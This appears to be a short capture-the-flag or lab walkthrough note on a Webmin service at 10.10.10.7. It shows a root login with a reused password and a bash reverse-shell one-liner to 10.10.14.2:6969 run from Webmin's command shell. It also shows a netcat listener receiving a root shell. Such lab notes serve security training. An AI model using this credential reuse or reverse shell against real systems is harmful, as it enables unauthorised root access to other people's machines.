6 :10000 webmin

Found webmin login at https://10.10.10.7:10000/session_login.cgi

  • Trying out creds admin:jEhdIekWmdjE > FAILS

  • Trying out creds root:jEhdIekWmdjE > WORKS

# Shell using
OTHERS > COMMAND SHELL > bash -c 'bash -i >& /dev/tcp/10.10.14.2/6969 0>&1'

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.7] 41033
bash: no job control in this shell
whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Last updated